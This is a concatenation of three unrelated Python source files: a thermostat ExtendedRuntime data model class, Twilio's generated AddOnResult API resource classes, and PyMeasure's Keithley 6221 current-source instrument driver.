'_actual_temperature',
'_actual_humidity',
'_desired_heat',
'_desired_cool',
'_desired_humidity',
'_desired_dehumidity',
'_dm_offset',
'_hvac_mode',
'_heat_pump1',
'_heat_pump2',
'_aux_heat1',
'_aux_heat2',
'_aux_heat3',
'_cool1',
'_cool2',
'_fan',
'_humidifier',
'_dehumidifier',
'_economizer',
'_ventilator',
'_current_electricity_bill',
'_projected_electricity_bill',
]
attribute_name_map = {
'last_reading_timestamp': 'lastReadingTimestamp',
'lastReadingTimestamp': 'last_reading_timestamp',
'runtime_date': 'runtimeDate',
'runtimeDate': 'runtime_date',
'runtime_interval': 'runtimeInterval',
'runtimeInterval': 'runtime_interval',
'actual_temperature': 'actualTemperature',
'actualTemperature': 'actual_temperature',
'actual_humidity': 'actualHumidity',
'actualHumidity': 'actual_humidity',
'desired_heat': 'desiredHeat',
'desiredHeat': 'desired_heat',
'desired_cool': 'desiredCool',
'desiredCool': 'desired_cool',
'desired_humidity': 'desiredHumidity',
'desiredHumidity': 'desired_humidity',
'desired_dehumidity': 'desiredDehumidity',
'desiredDehumidity': 'desired_dehumidity',
'dm_offset': 'dmOffset',
'dmOffset': 'dm_offset',
'hvac_mode': 'hvacMode',
'hvacMode': 'hvac_mode',
'heat_pump1': 'heatPump1',
'heatPump1': 'heat_pump1',
'heat_pump2': 'heatPump2',
'heatPump2': 'heat_pump2',
'aux_heat1': 'auxHeat1',
'auxHeat1': 'aux_heat1',
'aux_heat2': 'auxHeat2',
'auxHeat2': 'aux_heat2',
'aux_heat3': 'auxHeat3',
'auxHeat3': 'aux_heat3',
'cool1': 'cool1',
'cool2': 'cool2',
'fan': 'fan',
'humidifier': 'humidifier',
'dehumidifier': 'dehumidifier',
'economizer': 'economizer',
'ventilator': 'ventilator',
'current_electricity_bill': 'currentElectricityBill',
'currentElectricityBill': 'current_electricity_bill',
'projected_electricity_bill': 'projectedElectricityBill',
'projectedElectricityBill': 'projected_electricity_bill',
}
attribute_type_map = {
'last_reading_timestamp': 'six.text_type',
'runtime_date': 'six.text_type',
'runtime_interval': 'int',
'actual_temperature': 'List[int]',
'actual_humidity': 'List[int]',
'desired_heat': 'List[int]',
'desired_cool': 'List[int]',
'desired_humidity': 'List[int]',
'desired_dehumidity': 'List[int]',
'dm_offset': 'List[int]',
'hvac_mode': 'List[six.text_type]',
'heat_pump1': 'List[int]',
'heat_pump2': 'List[int]',
'aux_heat1': 'List[int]',
'aux_heat2': 'List[int]',
'aux_heat3': 'List[int]',
'cool1': 'List[int]',
'cool2': 'List[int]',
'fan': 'List[int]',
'humidifier': 'List[int]',
'dehumidifier': 'List[int]',
'economizer': 'List[int]',
'ventilator': 'List[int]',
'current_electricity_bill': 'int',
'projected_electricity_bill': 'int',
}
def __init__(
self,
last_reading_timestamp=None,
runtime_date=None,
runtime_interval=None,
actual_temperature=None,
actual_humidity=None,
desired_heat=None,
desired_cool=None,
desired_humidity=None,
desired_dehumidity=None,
dm_offset=None,
hvac_mode=None,
heat_pump1=None,
heat_pump2=None,
aux_heat1=None,
aux_heat2=None,
aux_heat3=None,
cool1=None,
cool2=None,
fan=None,
humidifier=None,
dehumidifier=None,
economizer=None,
ventilator=None,
current_electricity_bill=None,
projected_electricity_bill=None,
):
"""
Construct an ExtendedRuntime instance
"""
self._last_reading_timestamp = last_reading_timestamp
self._runtime_date = runtime_date
self._runtime_interval = runtime_interval
self._actual_temperature = actual_temperature
self._actual_humidity = actual_humidity
self._desired_heat = desired_heat
self._desired_cool = desired_cool
self._desired_humidity = desired_humidity
self._desired_dehumidity = desired_dehumidity
self._dm_offset = dm_offset
self._hvac_mode = hvac_mode
self._heat_pump1 = heat_pump1
self._heat_pump2 = heat_pump2
self._aux_heat1 = aux_heat1
self._aux_heat2 = aux_heat2
self._aux_heat3 = aux_heat3
self._cool1 = cool1
self._cool2 = cool2
self._fan = fan
self._humidifier = humidifier
self._dehumidifier = dehumidifier
self._economizer = economizer
self._ventilator = ventilator
self._current_electricity_bill = current_electricity_bill
self._projected_electricity_bill = projected_electricity_bill
@property
def last_reading_timestamp(self):
"""
Gets the last_reading_timestamp attribute of this
ExtendedRuntime instance.
:return: The value of the last_reading_timestamp attribute of
this ExtendedRuntime instance.
:rtype: six.text_type
"""
return self._last_reading_timestamp
@property
def runtime_date(self):
"""
Gets the runtime_date attribute of this ExtendedRuntime
instance.
:return: The value of the runtime_date attribute of this
ExtendedRuntime instance.
:rtype: six.text_type
"""
return self._runtime_date
@property
def runtime_interval(self):
"""
Gets the runtime_interval attribute of this ExtendedRuntime
instance.
:return: The value of the runtime_interval attribute of this
ExtendedRuntime instance.
:rtype: int
"""
return self._runtime_interval
@property
def actual_temperature(self):
"""
Gets the actual_temperature attribute of this ExtendedRuntime
instance.
:return: The value of the actual_temperature attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._actual_temperature
@property
def actual_humidity(self):
"""
Gets the actual_humidity attribute of this ExtendedRuntime
instance.
:return: The value of the actual_humidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._actual_humidity
@property
def desired_heat(self):
"""
Gets the desired_heat attribute of this ExtendedRuntime
instance.
:return: The value of the desired_heat attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_heat
@property
def desired_cool(self):
"""
Gets the desired_cool attribute of this ExtendedRuntime
instance.
:return: The value of the desired_cool attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_cool
@property
def desired_humidity(self):
"""
Gets the desired_humidity attribute of this ExtendedRuntime
instance.
:return: The value of the desired_humidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_humidity
@property
def desired_dehumidity(self):
"""
Gets the desired_dehumidity attribute of this ExtendedRuntime
instance.
:return: The value of the desired_dehumidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_dehumidity
@property
def dm_offset(self):
"""
Gets the dm_offset attribute of this ExtendedRuntime instance.
:return: The value of the dm_offset attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._dm_offset
@property
def hvac_mode(self):
"""
Gets the hvac_mode attribute of this ExtendedRuntime instance.
:return: The value of the hvac_mode attribute of this
ExtendedRuntime instance.
:rtype: List[six.text_type]
"""
return self._hvac_mode
@property
def heat_pump1(self):
"""
Gets the heat_pump1 attribute of this ExtendedRuntime instance.
:return: The value of the heat_pump1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._heat_pump1
@property
def heat_pump2(self):
"""
Gets the heat_pump2 attribute of this ExtendedRuntime instance.
:return: The value of the heat_pump2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._heat_pump2
@property
def aux_heat1(self):
"""
Gets the aux_heat1 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat1
@property
def aux_heat2(self):
"""
Gets the aux_heat2 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat2
@property
def aux_heat3(self):
"""
Gets the aux_heat3 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat3 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat3
@property
def cool1(self):
"""
Gets the cool1 attribute of this ExtendedRuntime instance.
:return: The value of the cool1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._cool1
@property
def cool2(self):
"""
Gets the cool2 attribute of this ExtendedRuntime instance.
:return: The value of the cool2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._cool2
@property
def fan(self):
"""
Gets the fan attribute of this ExtendedRuntime instance.
:return: The value of the fan attribute of this ExtendedRuntime
instance.
:rtype: List[int]
"""
return self._fan
@property
def humidifier(self):
"""
Gets the humidifier attribute of this ExtendedRuntime instance.
:return: The value of the humidifier attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._humidifier
@property
def dehumidifier(self):
"""
Gets the dehumidifier attribute of this ExtendedRuntime
instance.
:return: The value of the dehumidifier attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._dehumidifier
@property
def economizer(self):
"""
Gets the economizer attribute of this ExtendedRuntime instance.
:return: The value of the economizer attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._economizer
@property
def ventilator(self):
"""
Gets the ventilator attribute of this ExtendedRuntime instance.
:return: The value of the ventilator attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._ventilator
@property
def current_electricity_bill(self):
"""
Gets the current_electricity_bill attribute of this
ExtendedRuntime instance.
:return: The value of the current_electricity_bill attribute of
this ExtendedRuntime instance.
:rtype: int
"""
return self._current_electricity_bill
@property
def projected_electricity_bill(self):
"""
Gets the projected_electricity_bill attribute of this
ExtendedRuntime instance.
:return: The value of the projected_electricity_bill attribute
of this ExtendedRuntime instance.
:rtype: int
"""
return self._projected_electricity_bill
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.api.v2010.account.recording.add_on_result.payload import PayloadList
class AddOnResultList(ListResource):
def __init__(self, version, account_sid, reference_sid):
"""
Initialize the AddOnResultList
:param Version version: Version that contains the resource
:param account_sid: The SID of the Account that created the resource
:param reference_sid: The SID of the recording to which the AddOnResult resource belongs
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultList
"""
super(AddOnResultList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, 'reference_sid': reference_sid, }
self._uri = '/Accounts/{account_sid}/Recordings/{reference_sid}/AddOnResults.json'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams AddOnResultInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists AddOnResultInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of AddOnResultInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return AddOnResultPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of AddOnResultInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return AddOnResultPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a AddOnResultContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
return AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a AddOnResultContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
return AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.AddOnResultList>'
class AddOnResultPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the AddOnResultPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The SID of the Account that created the resource
:param reference_sid: The SID of the recording to which the AddOnResult resource belongs
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
super(AddOnResultPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of AddOnResultInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
return AddOnResultInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.AddOnResultPage>'
class AddOnResultContext(InstanceContext):
def __init__(self, version, account_sid, reference_sid, sid):
"""
Initialize the AddOnResultContext
:param Version version: Version that contains the resource
:param account_sid: The SID of the Account that created the resource to fetch
:param reference_sid: The SID of the recording to which the result to fetch belongs
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
super(AddOnResultContext, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, 'reference_sid': reference_sid, 'sid': sid, }
self._uri = '/Accounts/{account_sid}/Recordings/{reference_sid}/AddOnResults/{sid}.json'.format(**self._solution)
# Dependents
self._payloads = None
def fetch(self):
"""
Fetch the AddOnResultInstance
:returns: The fetched AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return AddOnResultInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the AddOnResultInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
@property
def payloads(self):
"""
Access the payloads
:returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
"""
if self._payloads is None:
self._payloads = PayloadList(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
add_on_result_sid=self._solution['sid'],
)
return self._payloads
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.AddOnResultContext {}>'.format(context)
class AddOnResultInstance(InstanceResource):
class Status(object):
CANCELED = "canceled"
COMPLETED = "completed"
DELETED = "deleted"
FAILED = "failed"
IN_PROGRESS = "in-progress"
INIT = "init"
PROCESSING = "processing"
QUEUED = "queued"
def __init__(self, version, payload, account_sid, reference_sid, sid=None):
"""
Initialize the AddOnResultInstance
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
super(AddOnResultInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'account_sid': payload.get('account_sid'),
'status': payload.get('status'),
'add_on_sid': payload.get('add_on_sid'),
'add_on_configuration_sid': payload.get('add_on_configuration_sid'),
'date_created': deserialize.rfc2822_datetime(payload.get('date_created')),
'date_updated': deserialize.rfc2822_datetime(payload.get('date_updated')),
'date_completed': deserialize.rfc2822_datetime(payload.get('date_completed')),
'reference_sid': payload.get('reference_sid'),
'subresource_uris': payload.get('subresource_uris'),
}
# Context
self._context = None
self._solution = {
'account_sid': account_sid,
'reference_sid': reference_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: AddOnResultContext for this AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
if self._context is None:
self._context = AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def status(self):
"""
:returns: The status of the result
:rtype: AddOnResultInstance.Status
"""
return self._properties['status']
@property
def add_on_sid(self):
"""
:returns: The SID of the Add-on to which the result belongs
:rtype: unicode
"""
return self._properties['add_on_sid']
@property
def add_on_configuration_sid(self):
"""
:returns: The SID of the Add-on configuration
:rtype: unicode
"""
return self._properties['add_on_configuration_sid']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def date_completed(self):
"""
:returns: The date and time in GMT that the result was completed
:rtype: datetime
"""
return self._properties['date_completed']
@property
def reference_sid(self):
"""
:returns: The SID of the recording to which the AddOnResult resource belongs
:rtype: unicode
"""
return self._properties['reference_sid']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
def fetch(self):
"""
Fetch the AddOnResultInstance
:returns: The fetched AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
return self._proxy.fetch()
def delete(self):
"""
Deletes the AddOnResultInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
@property
def payloads(self):
"""
Access the payloads
:returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
"""
return self._proxy.payloads
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.AddOnResultInstance {}>'.format(context)
|
|
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2021 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
from pymeasure.instruments import Instrument, RangeException
from pymeasure.adapters import PrologixAdapter
from pymeasure.instruments.validators import truncated_range, strict_discrete_set
from .buffer import KeithleyBuffer
import numpy as np
import time
from io import BytesIO
import re
class Keithley6221(Instrument, KeithleyBuffer):
""" Represents the Keithely 6221 AC and DC current source and provides a
high-level interface for interacting with the instrument.
.. code-block:: python
keithley = Keithley6221("GPIB::1")
keithley.clear()
# Use the keithley as an AC source
keithley.waveform_function = "square" # Set a square waveform
keithley.waveform_amplitude = 0.05 # Set the amplitude in Amps
keithley.waveform_offset = 0 # Set zero offset
keithley.source_compliance = 10 # Set compliance (limit) in V
keithley.waveform_dutycycle = 50 # Set duty cycle of wave in %
keithley.waveform_frequency = 347 # Set the frequency in Hz
keithley.waveform_ranging = "best" # Set optimal output ranging
keithley.waveform_duration_cycles = 100 # Set duration of the waveform
# Link end of waveform to Service Request status bit
keithley.operation_event_enabled = 128 # OSB listens to end of wave
keithley.srq_event_enabled = 128 # SRQ listens to OSB
keithley.waveform_arm() # Arm (load) the waveform
keithley.waveform_start() # Start the waveform
keithley.adapter.wait_for_srq() # Wait for the pulse to finish
keithley.waveform_abort() # Disarm (unload) the waveform
keithley.shutdown() # Disables output
"""
##########
# OUTPUT #
##########
source_enabled = Instrument.control(
"OUTPut?", "OUTPut %d",
"""A boolean property that controls whether the source is enabled, takes
values True or False. The convenience methods :meth:`~.Keithley6221.enable_source` and
:meth:`~.Keithley6221.disable_source` can also be used.""",
validator=strict_discrete_set,
values={True: 1, False: 0},
map_values=True
)
source_delay = Instrument.control(
":SOUR:DEL?", ":SOUR:DEL %g",
""" A floating point property that sets a manual delay for the source
after the output is turned on before a measurement is taken. When this
property is set, the auto delay is turned off. Valid values are
between 1e-3 [seconds] and 999999.999 [seconds].""",
validator=truncated_range,
values=[1e-3, 999999.999],
)
##########
# SOURCE #
##########
source_current = Instrument.control(
":SOUR:CURR?", ":SOUR:CURR %g",
""" A floating point property that controls the source current
in Amps. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
source_compliance = Instrument.control(
":SOUR:CURR:COMP?", ":SOUR:CURR:COMP %g",
"""A floating point property that controls the compliance of the current
source in Volts. valid values are in range 0.1 [V] to 105 [V].""",
validator=truncated_range,
values=[0.1, 105])
source_range = Instrument.control(
":SOUR:CURR:RANG?", ":SOUR:CURR:RANG:AUTO 0;:SOUR:CURR:RANG %g",
""" A floating point property that controls the source current
range in Amps, which can take values between -0.105 A and +0.105 A.
Auto-range is disabled when this property is set. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
source_auto_range = Instrument.control(
":SOUR:CURR:RANG:AUTO?", ":SOUR:CURR:RANG:AUTO %d",
""" A boolean property that controls the auto range of the current source.
Valid values are True or False. """,
values={True: 1, False: 0},
map_values=True,
)
##################
# WAVE FUNCTIONS #
##################
waveform_function = Instrument.control(
":SOUR:WAVE:FUNC?", ":SOUR:WAVE:FUNC %s",
""" A string property that controls the selected wave function. Valid
values are "sine", "ramp", "square", "arbitrary1", "arbitrary2",
"arbitrary3" and "arbitrary4". """,
values={
"sine": "SIN",
"ramp": "RAMP",
"square": "SQU",
"arbitrary1": "ARB1",
"arbitrary2": "ARB2",
"arbitrary3": "ARB3",
"arbitrary4": "ARB4",
},
map_values=True
)
waveform_frequency = Instrument.control(
":SOUR:WAVE:FREQ?", ":SOUR:WAVE:FREQ %g",
"""A floating point property that controls the frequency of the
waveform in Hertz. Valid values are in range 1e-3 to 1e5. """,
validator=truncated_range,
values=[1e-3, 1e5]
)
waveform_amplitude = Instrument.control(
":SOUR:WAVE:AMPL?", ":SOUR:WAVE:AMPL %g",
"""A floating point property that controls the (peak) amplitude of the
waveform in Amps. Valid values are in range 2e-12 to 0.105. """,
validator=truncated_range,
values=[2e-12, 0.105]
)
waveform_offset = Instrument.control(
":SOUR:WAVE:OFFS?", ":SOUR:WAVE:OFFS %g",
"""A floating point property that controls the offset of the waveform
in Amps. Valid values are in range -0.105 to 0.105. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
waveform_dutycycle = Instrument.control(
":SOUR:WAVE:DCYC?", ":SOUR:WAVE:DCYC %g",
"""A floating point property that controls the duty-cycle of the
waveform in percent for the square and ramp waves. Valid values are in
range 0 to 100. """,
validator=truncated_range,
values=[0, 100]
)
waveform_duration_time = Instrument.control(
":SOUR:WAVE:DUR:TIME?", ":SOUR:WAVE:DUR:TIME %g",
"""A floating point property that controls the duration of the
waveform in seconds. Valid values are in range 100e-9 to 999999.999.
""",
validator=truncated_range,
values=[100e-9, 999999.999]
)
waveform_duration_cycles = Instrument.control(
":SOUR:WAVE:DUR:CYCL?", ":SOUR:WAVE:DUR:CYCL %g",
"""A floating point property that controls the duration of the
waveform in cycles. Valid values are in range 1e-3 to 99999999900.
""",
validator=truncated_range,
values=[1e-3, 99999999900]
)
def waveform_duration_set_infinity(self):
""" Set the waveform duration to infinity.
"""
self.write(":SOUR:WAVE:DUR:TIME INF")
waveform_ranging = Instrument.control(
":SOUR:WAVE:RANG?", ":SOUR:WAVE:RANG %s",
""" A string property that controls the source ranging of the
waveform. Valid values are "best" and "fixed". """,
values={"best": "BEST", "fixed": "FIX"},
map_values=True,
)
waveform_use_phasemarker = Instrument.control(
":SOUR:WAVE:PMAR:STAT?", ":SOUR:WAVE:PMAR:STAT %s",
""" A boolean property that controls whether the phase marker option
is turned on or of. Valid values True (on) or False (off). Other
settings for the phase marker have not yet been implemented.""",
values={True: 1, False: 0},
map_values=True,
)
def waveform_arm(self):
""" Arm the current waveform function. """
self.write(":SOUR:WAVE:ARM")
def waveform_start(self):
""" Start the waveform output. Must already be armed """
self.write(":SOUR:WAVE:INIT")
def waveform_abort(self):
""" Abort the waveform output and disarm the waveform function. """
self.write(":SOUR:WAVE:ABOR")
def define_arbitary_waveform(self, datapoints, location=1):
""" Define the data points for the arbitrary waveform and copy the
defined waveform into the given storage location.
:param datapoints: a list (or numpy array) of the data points; all
values have to be between -1 and 1; 100 points maximum.
:param location: integer storage location to store the waveform in.
Value must be in range 1 to 4.
"""
# Check validity of parameters
if not isinstance(datapoints, (list, np.ndarray)):
raise ValueError("datapoints must be a list or numpy array")
elif len(datapoints) > 100:
raise ValueError("datapoints cannot be longer than 100 points")
elif not all([x >= -1 and x <= 1 for x in datapoints]):
raise ValueError("all data points must be between -1 and 1")
if location not in [1, 2, 3, 4]:
raise ValueError("location must be in [1, 2, 3, 4]")
# Make list of strings
datapoints = [str(x) for x in datapoints]
data = ", ".join(datapoints)
# Write the data points to the Keithley 6221
self.write(":SOUR:WAVE:ARB:DATA %s" % data)
# Copy the written data to the specified location
self.write(":SOUR:WAVE:ARB:COPY %d" % location)
# Select the newly made arbitrary waveform as waveform function
self.waveform_function = "arbitrary%d" % location
def __init__(self, adapter, **kwargs):
super(Keithley6221, self).__init__(
adapter, "Keithley 6221 SourceMeter", **kwargs
)
def enable_source(self):
""" Enables the source of current or voltage depending on the
configuration of the instrument. """
self.write("OUTPUT ON")
def disable_source(self):
""" Disables the source of current or voltage depending on the
configuration of the instrument. """
self.write("OUTPUT OFF")
def beep(self, frequency, duration):
""" Sounds a system beep.
:param frequency: A frequency in Hz between 65 Hz and 2 MHz
:param duration: A time in seconds between 0 and 7.9 seconds
"""
self.write(":SYST:BEEP %g, %g" % (frequency, duration))
def triad(self, base_frequency, duration):
""" Sounds a musical triad using the system beep.
:param base_frequency: A frequency in Hz between 65 Hz and 1.3 MHz
:param duration: A time in seconds between 0 and 7.9 seconds
"""
self.beep(base_frequency, duration)
time.sleep(duration)
self.beep(base_frequency * 5.0 / 4.0, duration)
time.sleep(duration)
self.beep(base_frequency * 6.0 / 4.0, duration)
display_enabled = Instrument.control(
":DISP:ENAB?", ":DISP:ENAB %d",
""" A boolean property that controls whether or not the display of the
sourcemeter is enabled. Valid values are True and False. """,
values={True: 1, False: 0},
map_values=True,
)
@property
def error(self):
""" Returns a tuple of an error code and message from a
single error. """
err = self.values(":system:error?")
if len(err) < 2:
err = self.read() # Try reading again
code = err[0]
message = err[1].replace('"', '')
return (code, message)
def check_errors(self):
""" Logs any system errors reported by the instrument.
"""
code, message = self.error
while code != 0:
t = time.time()
log.info("Keithley 6221 reported error: %d, %s" % (code, message))
code, message = self.error
if (time.time() - t) > 10:
log.warning("Timed out for Keithley 6221 error retrieval.")
def reset(self):
""" Resets the instrument and clears the queue. """
self.write("status:queue:clear;*RST;:stat:pres;:*CLS;")
def trigger(self):
""" Executes a bus trigger, which can be used when
:meth:`~.trigger_on_bus` is configured.
"""
return self.write("*TRG")
def trigger_immediately(self):
""" Configures measurements to be taken with the internal
trigger at the maximum sampling rate.
"""
self.write(":ARM:SOUR IMM;:TRIG:SOUR IMM;")
def trigger_on_bus(self):
""" Configures the trigger to detect events based on the bus
trigger, which can be activated by :meth:`~.trigger`.
"""
self.write(":ARM:SOUR BUS;:TRIG:SOUR BUS;")
def set_timed_arm(self, interval):
""" Sets up the measurement to be taken with the internal
trigger at a variable sampling rate defined by the interval
in seconds between sampling points
"""
if interval > 99999.99 or interval < 0.001:
raise RangeException("Keithley 6221 can only be time"
" triggered between 1 mS and 1 Ms")
self.write(":ARM:SOUR TIM;:ARM:TIM %.3f" % interval)
